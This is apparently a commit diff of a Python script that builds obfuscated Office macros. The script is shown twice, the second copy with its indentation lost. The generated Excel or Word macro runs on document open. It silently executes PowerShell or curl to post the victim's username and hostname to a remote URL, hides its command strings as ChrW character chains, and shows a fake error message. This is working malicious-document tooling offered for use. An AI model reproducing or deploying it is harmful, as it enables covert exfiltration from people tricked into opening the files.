r0yfire · July 26, 2017 14:35
diff --git a/macro_gen.py b/macro_gen.py
 #!/usr/bin/env python
 import string
 import random

 type = "excel"

 commands = {
    "win32": "PowerShell.exe -nop $postParams=@{username=$env:username;hostname=$env:computername};Invoke-WebRequest -Method POST -Body $postParams -Uri ",
    "win64": "PowerShell.exe -nop $postParams=@{username=$env:username;hostname=$env:computername};Invoke-WebRequest -Method POST -Body $postParams -Uri ",
    "mac": "curl -F username=$(whoami) -F hostname=$(hostname) -XPOST "
 }

 vbsTypsMap = {
    "word": {
        "function_name": "AutoOpen",
        "object_name": "ActiveDocument"
    },
    "excel": {
        "function_name": "Workbook_Open",
        "object_name": "ThisWorkbook"
    }
 }


 def obfuscate(cmd, varName):
    output = ""
    obfuscatedVars = []
    for i in range(0, len(cmd)):
        if (i % 10 == 0):
            obfuscatedVar = []
            obfuscatedVarName = ''.join(
                random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in range(15, 20))
            obfuscatedVar.append("ChrW(" + str(ord(cmd[i])) + ")")
        elif (i % 10 == 9):
            obfuscatedVar.append("ChrW(" + str(ord(cmd[i])) + ")")
            obfuscatedVars.append(obfuscatedVarName)
            lineToPrint = '\t' + obfuscatedVarName + ' = '
            for c in obfuscatedVar:
                lineToPrint += c + ' & '
            output += lineToPrint[0:-2] + "\r\n"
        elif (i == len(cmd) - 1):
            obfuscatedVar.append("ChrW(" + str(ord(cmd[i])) + ")")
            obfuscatedVars.append(obfuscatedVarName)
            lineToPrint = '\t' + obfuscatedVarName + ' = '
            for c in obfuscatedVar:
                lineToPrint += c + ' & '
            output += lineToPrint[0:-2] + "\r\n"
        else:
            obfuscatedVar.append("ChrW(" + str(ord(cmd[i])) + ")")

    cmdString = '\t%s = ' % varName
    for v in obfuscatedVars:
        cmdString += v + ' & '
    return output + "\r\n" + cmdString[0:-2]


 macro = """
 #If Mac Then
    Private Declare PtrSafe Function system Lib "libc.dylib" (ByVal command As String) As LongPtr
 #End If

 Function IsMac() As Boolean
 #If Mac Then
    IsMac = True
 #End If
 End Function

 Function Is64BitOffice() As Boolean
 #If Win64 Then
    Is64BitOffice = True
 #End If
 End Function

 Public Sub {vbsSubName}()
    Dim cmd As String
    Dim bash As String

    {cmdString}
    cmd = cmd + {vbsDocName}.CustomDocumentProperties("Client") + ";"

    {bashString}
    bash = bash + {vbsDocName}.CustomDocumentProperties("Client") + ";"

    If IsMac() Then
        system(bash)
    Else
        Dim Obj as Object
        Set Obj = CreateObject("WScript.Shell")
        Obj.Run cmd, 0
    End If
    MsgBox ("Required resource could not be allocated")
 End Sub
 """.format(vbsSubName=vbsTypsMap[type]['function_name'], vbsDocName=vbsTypsMap[type]['object_name'],
           cmdString=obfuscate(commands['win32'], 'cmd'), bashString=obfuscate(commands['mac'], 'bash'))

 print '\nMacro:'
 print macro
	#!/usr/bin/env python
	import string
	import random

	type = "excel"

	commands = {
	"win32": "PowerShell.exe -nop $postParams=@{username=$env:username;hostname=$env:computername};Invoke-WebRequest -Method POST -Body $postParams -Uri ",
	"win64": "PowerShell.exe -nop $postParams=@{username=$env:username;hostname=$env:computername};Invoke-WebRequest -Method POST -Body $postParams -Uri ",
	"mac": "curl -F username=$(whoami) -F hostname=$(hostname) -XPOST "
	}

	vbsTypsMap = {
	"word": {
	"function_name": "AutoOpen",
	"object_name": "ActiveDocument"
	},
	"excel": {
	"function_name": "Workbook_Open",
	"object_name": "ThisWorkbook"
	}
	}


	def obfuscate(cmd, varName):
	output = ""
	obfuscatedVars = []
	for i in range(0, len(cmd)):
	if (i % 10 == 0):
	obfuscatedVar = []
	obfuscatedVarName = ''.join(
	random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in range(15, 20))
	obfuscatedVar.append("ChrW(" + str(ord(cmd[i])) + ")")
	elif (i % 10 == 9):
	obfuscatedVar.append("ChrW(" + str(ord(cmd[i])) + ")")
	obfuscatedVars.append(obfuscatedVarName)
	lineToPrint = '\t' + obfuscatedVarName + ' = '
	for c in obfuscatedVar:
	lineToPrint += c + ' & '
	output += lineToPrint[0:-2] + "\r\n"
	elif (i == len(cmd) - 1):
	obfuscatedVar.append("ChrW(" + str(ord(cmd[i])) + ")")
	obfuscatedVars.append(obfuscatedVarName)
	lineToPrint = '\t' + obfuscatedVarName + ' = '
	for c in obfuscatedVar:
	lineToPrint += c + ' & '
	output += lineToPrint[0:-2] + "\r\n"
	else:
	obfuscatedVar.append("ChrW(" + str(ord(cmd[i])) + ")")

	cmdString = '\t%s = ' % varName
	for v in obfuscatedVars:
	cmdString += v + ' & '
	return output + "\r\n" + cmdString[0:-2]


	macro = """
	#If Mac Then
	Private Declare PtrSafe Function system Lib "libc.dylib" (ByVal command As String) As LongPtr
	#End If

	Function IsMac() As Boolean
	#If Mac Then
	IsMac = True
	#End If
	End Function

	Function Is64BitOffice() As Boolean
	#If Win64 Then
	Is64BitOffice = True
	#End If
	End Function

	Public Sub {vbsSubName}()
	Dim cmd As String
	Dim bash As String

	{cmdString}
	cmd = cmd + {vbsDocName}.CustomDocumentProperties("Client") + ";"

	{bashString}
	bash = bash + {vbsDocName}.CustomDocumentProperties("Client") + ";"

	If IsMac() Then
	system(bash)
	Else
	Dim Obj as Object
	Set Obj = CreateObject("WScript.Shell")
	Obj.Run cmd, 0
	End If
	MsgBox ("Required resource could not be allocated")
	End Sub
	""".format(vbsSubName=vbsTypsMap[type]['function_name'], vbsDocName=vbsTypsMap[type]['object_name'],
	cmdString=obfuscate(commands['win32'], 'cmd'), bashString=obfuscate(commands['mac'], 'bash'))

	print '\nMacro:'
	print macro